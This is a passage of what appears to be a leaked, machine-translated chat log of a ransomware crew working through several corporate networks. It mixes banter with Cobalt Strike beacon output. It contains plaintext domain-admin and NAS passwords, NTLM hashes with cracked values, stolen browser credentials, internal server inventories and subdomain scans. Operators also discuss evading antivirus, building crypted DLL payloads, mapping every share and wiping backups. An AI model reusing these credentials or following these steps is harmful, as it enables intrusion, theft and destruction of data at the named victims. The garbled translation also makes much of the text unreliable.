datavault 594d1d0f2355dbd18bab80250cd9a1c4
domainrestore 594d1d0f2355dbd18bab80250cd9a1c4
mapusatera c9f45ab5e6cc7b11dcf9b3bce3fa64df
Administrator ee54eb9485bf78494a7074cb7b0513a0
veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
Applied debd2d79f79e305817da0ec58509d686
DBunte debd2d79f79e305817da0ec58509d686
gkeller 134cee9671bb94bffdaefb6f84f5989d
SEnglert 036c9df1839c6adc5e65c74fffdca10b
``root Waterway99!``
nasik with backups:
    192.168.0.3 Waterway 11915Wnas2179!
```
```
DA:
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
Yeah, wait a minute...) maybe we'll do the same thing with linux) Yeah, we'll do the same thing with linux + a > delitvot we'll also lose there then ok I thought it was inside))) at the bottom the forebar from your dedicaaaanoooo listen I dont know how to look admin-list on this thing
https://192.168.0.42
https://192.168.0.43
https://192.168.0.75
https://192.168.0.77
i used smb_login+wasn't allowed to write it right? everyone went there as polzak only he didn't even let me see the balls and i couldn't check the lats.it's 445 closed? great, as on the 3rd picture and in the folders are such files as on the 2nd picture and in it are such folders nasik, did you get into the backup? ``192.168.0.3\.\Waterway 11915Wnas2179!`` And tried to break through? and the socket is open ``
198.61.195.78:5948
198.61.195.78:1433
198.61.195.78:21 (220 Microsoft FTP Service)
That would be a good place to start. Let me scan the ports. Wasn't there an rdp port? Or 445?
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 23:32:52> shell ping raxdb.waterway.com -n 1
[*] Tasked beacon to run: ping raxdb.waterway.com -n 1
[+] host called home, sent: 59 bytes
[+] received output:

Pinging raxdb.waterway.com [198.61.195.78] with 32 bytes of data:
Reply from 198.61.195.78: bytes=32 time=19ms TTL=114

Ping statistics for 198.61.195.78:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms

``No, why not? I'm trying to pick up passwords from browsers and mimikau technicians empty? I'm picking up a password under the HERE that TL2 planted so what do we have here?
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:59:37> shell net view \\CLEBACKUP2020 /all
[*] Tasked beacon to run: net view \\CLEBACKUP2020 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 5 has occurred.

Access is denied.

``````
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:54:41> shell net view \\\MWEISSDESKTOP /all
[*] Tasked beacon to run: net view \\\MWEISSDESKTOP /all
[+] host called home, sent: 60 bytes
[+] received output:
Shared resources at \\MWEISSDESKTOP



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
Brother HL-5450DN series Print Brother HL-5450DN series
C$ Disk Default share
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:01> shell net view \\U20OFFICENEW /all
[*] Tasked beacon to run: net view \\U20OFFICENEW /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \U20OFFICENEW



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:42> shell net view \\DVRNEWBACKUP20 /all
[*] Tasked beacon to run: net view \\DVRNEWBACKUP20 /all
[+] host called home, sent: 61 bytes
[+] received output:
Shared resources at \DVRNEWBACKUP20



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:56:09> shell net view \\KCNEWBACKUP2020 /all
[*] Tasked beacon to run: net view \\KCNEWBACKUP2020 /all
[+] host called home, sent: 62 bytes
[+] received output:
Shared resources at \KCNEWBACKUP2020



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C Disk
C$ Disk Z: Default share
IPC$ IPC Remote IPC
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:56:34> shell net view \\WATERWAY43OFFIC /all
[*] Tasked beacon to run: net view \\WATERWAY43OFFIC /all
[+] host called home, sent: 62 bytes
[+] received output:
System error 53 has occurred.

The network path was not found
``````
http://192.168.0.3:5000 - NAS

NAS (nimble storage)
login/passenger Administrator\1853Gators
https://192.168.0.42:443
https://192.168.0.43:443
https://192.168.0.75:443
https://192.168.0.77:443

\192.168.0.164 - check the car for important information

unknown unix servers (eshi?)
192.168.0.10:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
192.168.0.9:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
``````
192.168.0.159:445 (platform: 500 version: 6.1 name: MWEISSDESKTOP domain: WATERWAY)
192.168.20.2:445 (platform: 500 version: 10.0 name: U20OFFICENEW domain: WATERWAY)
192.168.42.2:445 (platform: 500 version: 10.0 name: DVRNEWBACKUP20 domain: WATERWAY)
192.168.30.2:445 (platform: 500 version: 10.0 name: KCNEWBACKUP2020 domain: WATERWAY)
192.168.43.2:445 (platform: 500 version: 10.0 name: WATERWAY43OFFIC domain: WATERWAY)
``user9user8user4 in fact all the cars that I see (those that AD) can connect to them or pull, but the feeling that I'm missing or looking in the wrong direction if you take it completely, then I
have not found an area (want something I can connect to)
did not find how to disable AV
and did not find cloud backups (stalin said they have cloud, something like that he mentioned) and what's the problem? it uses Hyper-V`WATERWAY\blauer 11915Admin2179!` only his clips found
mapusatera
Applied
djarden
blauer
```
i checked these polzakovtut what do we have? burned it means before this kmd was running and how was your tpsh working before this? ok i'll give you a replacement give this skipnet worth a try?
Fix 3. Stop the process of the related .dll
It's not even there, why not just turn it off? It's like the most harmless thing you can do.
Press Win + R on your keyboard
Type in taskschd.msc and press Enter
In the Task Scheduler click on Task Scheduler Library once
Right-click on the BackgroundContainer task and select Delete
``there's a fix2what? I think the second option to tryhttp://ugetfix.com/ask/how-to-fix-the-specified-module-could-not-be-found-error-on-windows/running chrome even this error is better with or without ehehehehex the same need to write rundll32.exe? yukwin r > rundll32 ...i'll build you ehe and dll, start with dll can i run rundll through ran? let me build the shellcode myself or you through a cool cryptor?+ do not forget only to download through incognito and tdn let's try the load will be dirtierhough the meaning if not shells do not work ... and the link through chrome download by rndl to download it in cobemo try load exe load in cobemo?and temp.dll is there[ ](https://mediaeveryone.com/group/healthcare-com?msg=rQzLkTcw6J6FGXwuD) and with this also when I put the load tpsh in ran - the same error or win r > cmd /c echo 123 > C:\file.namewin r > load tpshPrefer to not run the guish versionwin r > cmd
win r > powershella how do you use it? through ran it's exactly the same so you should also find ityou can search for gtzkeybind I'll do it on win r over rd pops up this will open the gtz menu try win + r tried just a shortcut from startup, creating a shortcut how do you start it?when you run verashell it's the same when you run kmd over rd there are still no sessions ?
```
beacon> shell net user ndevbernst /dom
[*] Tasked beacon to run: net user ndevbernst /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

``Today almost all of the offreleases'' comps didn't give anything either
no web services found, no whining either
let relay and let's go home)what was the result yesterday? all hello an login or remuve action
it's weird of course it's in the network but with 2fa
```
the standard practice of all EDR systems, forsom 2fa by default on the soap? and 2fa where? strange that it is within the network but with 2fam I remember 2famel kazhikkaa admin from the cassie found like yes? no admin found7buildtrt 100% no, we have cassie that does not respond to us at all you have problems here with the av yes?aha, the original was https://github.com/djhohnstein/ЅһагрЅһагеѕсами rolled up the software or what? yes there is no git yet, test it while you can original name or link to giti threads how much will you say there is one, sharpsharsng can run a batch on every worked out host this will really fast? network is big enough, psec does not work fast, there would be some multi-trade tool? to all letters of the alphabet then the batch that checks the drive with a label to the letters of the label + $)) but your version I like it moreda from my point of view so just the right thing to do in the batcha why? I thought you had a cycle of available drives) not to choose "where any" there is simply prescribed all possible logical drives are not available
i didn't save it because it's very dumbepsekom throughout the domain?) and i won't even answer this question) is there a batnik? but if i additionally share, it's impossible to fuck something up in the processwhich is also self-mappable we'll prioritize them for the network why?we need to upload them to the label all the same? on the absolute access to share ALL disks on ALL PCs do you get it? it's when we upload to ALL servers a batnik which opens ALL the balls which increases the fucking coverage and speed by the way
there's another cool thing.
let's try to increase the percentage of closed "area" on the network;)preclude all pk in the networkWake On Lannea, to @tl2 what the ox? is it a question for us? by the way this network will be nailed with WOL?
begitenu after pinging through SharpSharesNG there are more of them)prank serverse) 71 servak of 53 alive?
53 servers (71 alive)
``````
WEB4: 89.0.0.158
WEB4: 89.0.0.157
WEB4: 89.0.0.156
WEB4: 89.0.0.155
WEB4: 89.0.0.154
WEB4: 89.0.0.0.153
WEB4: 89.0.0.0.152
WEB4: 89.0.0.0.151
WEB4: 89.0.0.0.150
WEB4: 89.0.0.66
WEB4: 65.162.42.254
WEB4: 65.162.42.252
WEB4: 65.162.42.251
WEB4: 65.162.42.250
WEB4: 65.162.42.242
WEB4: 65.162.42.197
``````
winona.rtpco.local

118 cars per hell
64 armies on the wind (10 alive)
53 servers (71 alive)
``I'm gonna re-populate everything before we shut down.``
forget about it@tl2 seems to be a rudiment[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=FMtieCLZo3Sm43oj4) that's the one above. it's different. richmondDC2.us.alloypolymers.com````
beacon> shell dnscmd us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd us.alloypolymers.com /info
[+] host called home, sent: 64 bytes
[+] received output:

Query result:

Server info
	server name = RichmondDC2.us.alloypolymers.com
	version = 25800306 (6.3 build 9600)
	DS container = cn=MicrosoftDNS,cn=System,DC=us,DC=alloypolymers,DC=com
	forest name = us.alloypolymers.com
	domain name = us.alloypolymers.com
	builtin forest partition = ForestDnsZones.us.alloypolymers.com
	builtin domain partition = DomainDnsZones.us.alloypolymers.com
	read only DC = 0
	last scavenge cycle = not since restart (0)
  Configuration:
	dwLogLevel = 00000000
	dwDebugLevel = 00000000
	dwRpcProtocol = 00000005
	dwNameCheckFlag = 00000002
	cAddressAnswerLimit = 0
	dwRecursionRetry = 3
	dwRecursionTimeout = 8
	dwDsPollingInterval = 180
  Configuration Flags:
	fBootMethod = 3
	fAdminConfigured = 1
	fAllowUpdate = 1
	fDsAvailable = 1
	fAutoReverseZones = 1
	fAutoCacheUpdate = 0
	fSlave = 0
	fNoRecursion = 0
	fRoundRobin = 1
	fStrictFileParsing = 0
	fLooseWildcarding = 0
	fBindSecondaries = 0
	fWriteAuthorityNs = 0
	fLocalNetPriority = 1
  Aging Configuration:
	ScavengingInterval = 0
	DefaultAgingState = 1
	DefaultRefreshInterval = 168
	DefaultNoRefreshInterval = 168
  ServerAddresses:

	Ptr = 00000057578A8210
	MaxCount = 2
	AddrCount = 2
		Addr[0] => af=23, salen=28, [sub=0, flag=00000000] p=13568, addr=fe80::1ea:20ef:8dbe:2e0
		Addr[1] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=10.1.1.247

  ListenAddresses:
 	NULL IP Array.
  Forwarders:

	Ptr = 00000057578A8C40
	MaxCount = 4
	AddrCount = 4
		Addr[0] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=64.83.1.10
		Addr[1] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=64.83.0.10
		Addr[2] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=209.218.44.2
		Addr[3] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=209.125.133.6

	forward timeout = 3
	slave = 0
Command completed successfully.



``````
beacon> shell dnscmd gaproc.us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd gaproc.us.alloypolymers.com /info
[+] host called home, sent: 71 bytes
[+] received output:

Info query failed
    status = 1722 (0x000006ba)

Command failed: RPC_SERVER_UNAVAILABLE 1722 0x6BA

``Maybe it's about dnscmd? Maybe that's what I was poking at? Re-scanning seabell``.
  Entry : gaproc.us.alloypolymers.com
  Name : gaproc.us.alloypolymers.com
  Data : 192.168.1.121

  Entry : gaproc
  Name : gaproc.us.alloypolymers.com
  Data : 192.168.1.121

If it's not in the dns entries of the domain controllers, then if there is no other way to check it, then skip it, there's nothing to see in hell, it's not there.
Teemo[WINDC2]SYSTEM */4284|2020Dec25 01:04:37> portscan 192.168.3.0/24 1-10000
[*] Tasked beacon to scan ports 1-10000 on 192.168.3.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``Let's leave it at that time``.
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:57:22> remote-exec psexec 89.0.10.104 tasklist
[*] Tasked beacon to run 'tasklist' on 89.0.10.104 via Service Control Manager
[+] host called home, sent: 1998 bytes
[-] Could not open service control manager on 89.0.10.104: 1728
``We won't make any unnecessary noise, I think there are backups, but they're all visible.
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:56:06> shell tasklist /v /s 89.0.10.104
[*] Tasked beacon to run: tasklist /v /s 89.0.10.104
[+] host called home, sent: 57 bytes
[+] received output:
ERROR: The RPC server is unavailable.
``Do a scan here too on /24``.
--- Chromium Credential (User: dch) ---
URL : http://192.168.3.254:5000/webman/login.cgi
Username : admin
Password : 11Dennis
```
this kind of crap i had in my browser, i tried to go through proxa did not load it at all @user7 but check on our tasklist /v /see if you have downloaded it? no, i was paying special attention to links with home and i met paths there? guys, all information that i downloaded from the cars technareim i think so
maybe it's just a rudimentary
relic of a bygone era.
[*] Tasked beacon to scan ports 135,139,445,80,443,8080,1433 on 192.168.1.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``yeah
let's go portrait it can be ping filtered...and also specify + rpn 135,139,445, web ports and scuSo check all /24 ``

Teemo[WINDC2]SYSTEM */4284|2020Dec24 21:36:28> shell ping gaproc.us.alloypolymers.com -n 1
[*] Tasked beacon to run: ping gaproc.us.alloypolymers.com -n 1
[+] host called home, sent: 68 bytes
[+] received output:

Pinging gaproc.us.alloypolymers.com [192.168.1.121] with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.1.121:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

``Are you pinging it from the US? khmotskate diapNot pinged (lol)))
seriously, where did you spot it? ipsac local range? tarao maps pointed the way)))is it pinging?
the diap is scanned where is it pinged? where is it pinged from? it's not in the trusts at all not in ADON in quarantine? there is also a trust that is not accessed in general fuck
interestingThis is no gir on the stripped down linuxen as i understand this is nas on the stripped down windup ?the files are fresh sneezy nordic school) nice guys) well, there's a glorlocher will go over itWhen it works - everything is fine check the record in this dirudite a screenshot or listing dir with the size of the filesNot always on them disks are shared, there in the settings you can just select a folder where you want to put your backupsminute I'm reading here @tl2@tl2call the guru @tl2 there should be shared disksa although maybe too early to rejoice really surprised myself)thanks for telling me to look, otherwise I would have fucked with it for a week) @tl2 look at it most likely she had access whose keypad is it?what account did you upload? how come you had access the whole time? although you had access anyway) that's the point, you said yourself look no viv and until then we were looking for creeds from web muzzlekak how?
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:32:40> shell net use *\\89.0.10.104\Documents
[*] Tasked beacon to run: net use *\\\89.0.10.104\Documents
[+] host called home, sent: 64 bytes
[+] received output:
Drive Z: is now connected to \89.0.10.104\Documents.

The command completed successfully.


Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:32:53> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \89.0.10.104\Documents Microsoft Windows Network
The command completed successfully.

``Do you have access to the balloon view?
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:29:28> shell net view \89.0.10.104 /all
[*] Tasked beacon to run: net view \89.0.10.104 /all
[+] host called home, sent: 58 bytes
[+] received output:
Shared resources at \89.0.10.104

nas-D5-E2-B8

Share name Type Used as Comment

-------------------------------------------------------------------------------
Documents Disk Document folder
IPC$ IPC IPC Service ("nas-D5-E2-B8")
Music Disk Music folder
Pictures Disk Picture folder
Videos Disk Video folder
The command completed successfully.

``no viv nasa or what ?``and give net view \\hosdt /all can't find anything related to nasomnu how are you doing ?``I found another trust ``gaproc.us.alloypolymers.com`` but it is not availablesolidlydethey have been so successful all on kmd5 ?
fc525c9683e8fe067095ba2ddc971889 Passw0rd!
7facdc498ed1680c4fd1448319a8c04f Password1!
876c802a60e4623dae480bf75d215bbc 11dchamh
083c3829383f6ce4bd61ee1135fa14cf qcqcqc1

``Check the @tl1`` Credits
winona.rtpco.local
Administrator c5cd921bd3aaaad70c0ee9e14bfe096c
dch 876c802a60e4623dae480bf75d215bbc
DEPCON 083c3829383f6ce4bd61ee1135fa14cf
``````

rtpco.local
Administrator 544599e93b8ab30d2a53ec48ce7ca6da
arobinsona fc525c9683e8fe067095ba2ddc971889 (Installed by many users)
cancelet 8669993c0b6f8d65cd206a0c9e1d598b
kaseyaservice d4e06b1ecf49e3d7932fba37fc6e96d5
O365Service 7facdc498ed1680c4fd1448319a8c04f
sagert 86517550f7c701dbb1f28f23a39fad9b
spicescan ca1484e694d5ca64dd6b59e3510d7f73
``good night''
7259ade8efc785abb4043e171e06b9c6 300SpartanS
88781646e2a2399370c54bae7f790e58 @d0nix
b4712f346339be917d4d9fe2ce3c387c barracuda
5acd3ae4a25e042cb01513ea9104b598 Barracuda
f97f8542534b19414d871e197d222747 Gutch@!!
960736ab56cfa8943d4de07ef142a730 boston
ae8e27dc85a2682037008ebe671655f0 afdljplw
b6c367027c0d73a755244ad52bda9a67 !nC0rr3ct
6c77565149af62e68bb41868d29ec47a d0n3g0n3
e9b57eb8af25befb91bda9b4ed95097c 11Saundra
a99a74eb78fc1f1ea3a89b53b7de7179 p@perm00n
b4712f346339be917d4d9fe2ce3c387c barracuda
26e7f39a25b859023e876293c37495e3 D33pw@ter
4df7f5cc8377559b058c30516ca88a30 sub@sh2005
06ee9928c5ebc952e0fc44e300ff821f c]st0m3r
5f6e5864d8622c481a233d9472f1b3a8 Gahann@
652805d304727fa73d6c4c7cfef31986 Calib3r9

``Till tomorrow''.
Administrator 66ac9a770e02cfdded6d5bd957a774fb
Angel 7259ade8efc785abb4043e171e06b9c6
adonixadmin 88781646e2a2399370c54bae7f790e58
alloyamms ab6be57f8c4cc213e70158f87953f45a
barracuda b4712f346339be917d4d9fe2ce3c387c
BarracudaBUP 5acd3ae4a25e042cb01513ea9104b598
bbuerck f97f8542534b19414d871e197d222747
BGW 960736ab56cfa8943d4de07ef142a730
CAncelet ae8e27dc85a2682037008ebe671655f0
canceleta b6c367027c0d73a755244ad52bda9a67
cevansa 6c77565149af62e68bb41868d29ec47a
citrix_svc 66ac9a770e02cfdded6d5bd957a774fb
DHaase e9b57eb8af25befb91bda9b4ed95097c
EntAdmin a99a74eb78fc1f1ea3a89b53b7de7179
gahbarracuda b4712f346339be917d4d9fe2ce3c387c
orgbarracuda 26e7f39a25b859023e876293c37495e3
sagert 86517550f7c701dbb1f28f23a39fad9b
Services_Backup 4df7f5cc8377559b058c30516ca88a30
Uptime 06ee9928c5ebc952e0fc44e300ff821f
veeam 5f6e5864d8622c481a233d9472f1b3a8
wstangea 652805d304727fa73d6c4c7cfef31986

The ``dropsession files in slipk 6okay then on tomorrow roll there logins(mail), with clears what is there([ ](https://mediaeveryone.com/group/rtpcompany-com?msg=eypQF6sQrBzHzsJKD) mail sootv from hell, or login accountswith @tl1 when we worked at ART for a long time, probably a good half of critical accesses from e-mails that were not on machines there and network diagrams and instructions on connections and keys and passwords e-mail is a treasure of information in many companies, he had to go under a proxy on the ADR to be routed to mycr and authorize there, and very often he flies through the mail to the microsoft site. Do you think he who passed the data on the posta here? there either the pass does not fit, or not created a box, or an empty mail, not a word about us and the ip and the hostname? in the mail all the clerks checked - empty you scan on subdomains `` ``
Subdomain IP address OS Server Technology Web Platform Page Title
autodiscover.rtpcompany.com 52.97.170.40 Sign in to Outlook
sip.rtpcompany.com 52.112.65.203 RTC 7.0
dns2.rtpcompany.com 63.219.151.12
vpn2.rtpcompany.com 64.213.220.250
ssl.rtpcompany.com 65.162.42.135
vpn.rtpcompany.com 65.162.42.173
wiki.rtpcompany.com 65.162.42.180
mail.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
mailhost.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
pop3.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
smtp.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
ts.rtpcompany.com 65.162.42.198
exchange.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
search.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
webmail.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
docs.rtpcompany.com 65.162.42.206 Windows Microsoft-IIS 7.5 ASP.NET IIS7
citrix.rtpcompany.com 65.162.42.222 Windows Microsoft-IIS 7.5 ASP.NET
web1.rtpcompany.com 65.162.42.241
beta.rtpcompany.com 65.162.42.241
asia.rtpcompany.com 65.162.42.246
dns4.rtpcompany.com 65.162.42.249
rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company
web.rtpcompany.com 65.162.42.250
ftp.rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company
home.rtpcompany.com 65.162.42.251 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319
public.rtpcompany.com 65.162.42.252 Windows Microsoft-IIS 7.5 ASP.NET public.rtpcompany.com
www.rtpcompany.com 167.71.108.192 PHP WordPress 5.6 RTP Company
fr.rtpcompany.com 204.248.115.14
es.rtpcompany.com 204.248.115.14
dns.rtpcompany.com 205.243.114.218
dns3.rtpcompany.com 208.94.147.135
data.rtpcompany.com 216.252.195.128 Windows Microsoft-IIS 7.5 ASP.NET 2.0.50727 Advanced Materials Search by Property, Composition, or Text
``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=nA3hZ2RS3fYvk3hP9) I'm just afraid to use it, after the obvious errors of other tools) throw the hashes of all YES quickly run them through kmd5sobot kredes domain
https://webmail.rtpcompany.com/owa/auth/logon.aspx
``alternative
https://exchange.rtpcompany.com/owa/auth/logon.aspx
``above mistake once disassemble the tool and we will be happy with the search of all mail@tl1 please, with mailsnapper dig `mail.rtpcompany.com ``rtpcompany.comThe computers that I came across offnut, I ngdeto seen a link to the domain mail, it must be found.
After that, I'll try to connectwhy not get a quick look now a quick look not to get into tomorrow during office hours did not look therepasswordpochtu? I think so yes it first did just in case)but google default root pass to port 22 for ReadyNAS hardly anyone goes there at all on ssh just bros, this is not a full-fledged lin
it's a nixlike system for haaS if there's only lin backups then just shred the server into zeros and fuck it
delete
lin don't get lost
```
Why can't i break it? just open the smb balloon and break it as you please. go through all available usernames, passwords + all vulnerabilities from the msf - no point in moving it to tomorrow? to try to find the data i need to check every arm and servicecloud. That's a long time.
89.0.1.6:445 (platform: 500 version: 5.0 name: MAINT domain: WORKGROUP)
 http://89.0.1.6/rtp/index.cfm
``````
Teemo[23L1]TOM/3608|2020Dec24 06:00:28> shell nslookup 89.0.10.104
[*] Tasked beacon to run: nslookup 89.0.10.104
[+] host called home, sent: 51 bytes
[+] received output:
Server: mndc2.rtpco.local
Address: 89.0.0.83

Name: nas-D5-E2-B8.rtpco.local
Address: 89.0.10.104

``````
URL : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx
Username : tom
Password : Passw0rd!

``Isn't the ip or hostname glowing in the admins' browsers?
[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)
Did you look for access? No, not in any domain ad users do not have geodunase if there is no files on the pc, maybe they did a search on NASnet/ And read the mail of admins?) Guys, we will search for a long time))) Give me a screenshot of the web admin
WINONA\TOM abcabc4
RTPCO\corr 00sthomas
RTPCO\pvcimpro 4qbuyh
RTPCO\rmiller 789)_+rm
RTPCO\dpflughoeft BabyYoda123
rtpco\administrator d0T73Rd!
WINONA\Administrator DA7PaM8h
DEPCONSG/administrator dropC
AXREMOTESRV\Administrator dropCod5
RTPCO\npaine Jsnp&524
WINONA\rmiller michael1
WINONA Color Plastics1
rtpco\bkouba PrayersNeeded2020!
RTPCO\lmiller Ronnie11
``Not wind?
beacon> portscan 89.0.10.104 1-10000 icmp 200
[*] Tasked beacon to scan ports 1-10000 on 89.0.10.104
[+] host called home, sent: 75365 bytes
[+] received output:
(ICMP) Target '89.0.10.104' is alive. [read 8 bytes]
89.0.10.104:10000

[+] received output:
89.0.10.104:8200

[+] received output:
89.0.10.104:5355

[+] received output:
89.0.10.104:3702

[+] received output:
89.0.10.104:443

[+] received output:
89.0.10.104:139
89.0.10.104:80

[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)

[+] received output:
89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)
Scanner module is complete
Portscan in progressDefault combinations do not fitNow give portscanYou guys do not read the messages When do we start pulling? What will pull the servers to divide among themselves You decide what to do there?[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=abZxmjF9E8zPF4rJL) and this[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=rWw6TTnNd5ZKh7yGQ) took this [ ] (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)
didn't come up YES LA as local admins
```
no access to folders on the NAS or did you try to authorize? no on the PC admins watched the rg files? re-checked all the Administrator did not fit YES LA as local admins and check the webcards YES / default for this NASa if no access - then log on 80/443 try to strange question))) lock it need)) access that is it? LA or DA some? @tl2 what do we do with us? 1) We are not broken into groups of servers
2) We're in the vorgsteins.
us.alloypolymers.com SERVER
ALLOYLICWEB: 10.1.1.238
ALLOYAPP3: 10.1.1.250
RICHMONDDC1: 10.1.1.248
RICHMONDDC2: 10.1.1.247
ALLOYAMMS: 10.1.1.231
GAH2K3SRV1: 10.1.10.40
GAHDC2: 10.1.10.81
ALLOYCRKT01: 10.1.5.250
CROCKETTDC1: 10.1.5.241
ALLOYORGAPP01: 10.1.8.11
ALLOYEXCH02: 10.1.1.240
ORANGEDC1: 10.1.8.248
ALLOYSQL01: 10.1.1.243
ALLOYXENAPP: 10.1.1.237
ALLOYAPP01: 10.1.1.251
RICHMONDSTORAGE: 10.1.1.245
OHPRINTSRV: 10.1.10.12
OHSPICEWORKS: 10.1.10.11
CROCKETTSTORAGE: 10.1.5.242
ALLOYWEB2: 10.1.8.210
GAHDC01: 10.1.10.82
ORANGESTORAGE: 10.1.8.245
ORGPRINTSRV: 10.1.8.246
CTXALLOYCONNECT: 10.1.1.221
``Just one more time, the avs decided to bypass the inject all ready?
rtpco.local SERV
AXBATCH-TEST: 10.89.11.112
WINONAV1: 10.89.11.22
AXAOS-BUILD: 10.89.11.120
SAN-HQ: 10.89.11.35
AXDEV3: 10.89.11.103
AXDEV6: 10.89.11.106
MINITABLIC: 10.89.11.6
AXDEV1: 10.89.11.101
AXDEV2: 10.89.11.102
AXSQL-DEV: 10.89.11.118
TX-TESTSRV1: 10.58.0.166
MXSTORAGE: 10.13.0.14
SHENZDC1: 10.17.1.5
NVSTORAGE: 10.57.0.36
NEVADAHYPV1: 10.57.0.84
NVDC1: 10.57.0.32
SUZHOUDC2: 10.7.0.41
SUZHOUPRINTSRV: 10.7.0.21
SINGDC1: 10.5.0.4
SINGDC2: 10.5.0.5
SINGSTORAGE: 10.5.0.19
MNDC2: 89.0.0.81
``Yes, Captain''.
rtpco.local SERV.
CTXCONNECTOR2: 10.89.11.27
CTXCONNECTOR1: 10.89.11.26
SQLPROD1: 10.89.0.99
KASEYA: 10.89.11.24
CTXAPP3: 10.89.11.28
ONBASEPROD1: 10.89.11.7
ONBASETEST: 10.89.11.10
CTXAPP4: 10.89.11.11
ONBASETEST01: 10.89.11.33
WEBPROD01: 10.89.11.31
PDM01: 10.89.11.32
SOLARWINDS: 10.89.11.2
WINPAK01: 10.89.0.111
MAINTENANCE: 10.89.11.40
MNDC2: 89.0.0.83
STORAGEWINONA2: 10.89.11.14
AXFORMS-DEV: 10.89.11.111
EXCHANGE: 10.89.11.10
ADMT: 10.89.11.5
INDYDC1: 10.59.0.4
AXREPORTS-DEV: 10.89.11.121
AXAOS-TRAINING: 10.89.11.122
AXAOS-TEST: 10.89.11.123
``are you ready?
rtpco.local SERV
FRANCEDC1: 10.4.0.25
FRANCEDC2: 10.4.0.26
FRANCESTORAGE: 10.4.0.27
FRANCEPRINTSRV: 10.4.0.28
GERMANYDC1: 10.20.0.40
GERMANYDC2: 10.20.0.41
GERMANYSTORAGE: 10.20.0.42
FR-VIR2008-02: 10.4.0.19
FRANCESAGE: 10.4.0.100
FRANCEINTERMEC: 10.4.0.72
FRANCEARCHIVE: 10.4.0.10
DC1POLAND: 10.28.0.5
POLSTORAGE: 10.28.0.8
DC2POLAND: 10.28.0.6
MNDOMAIN6: 10.89.0.20
PV-PROD2: 10.89.0.87
PV-PROD1: 10.89.0.86
SNAP: 10.89.10.12
RTPADFS1: 89.0.0.191
VADC1: 10.56.0.30
VADC2: 10.56.0.31
CHILLER2: 10.89.10.11
VADC2: 10.56.0.35
``````

rtpco.local
25L27A: 89.0.191.55
30L107: 89.0.191.64
25L21: 172.22.200.26
BBDESK2: 89.0.192.80
26L19: 10.58.0.132
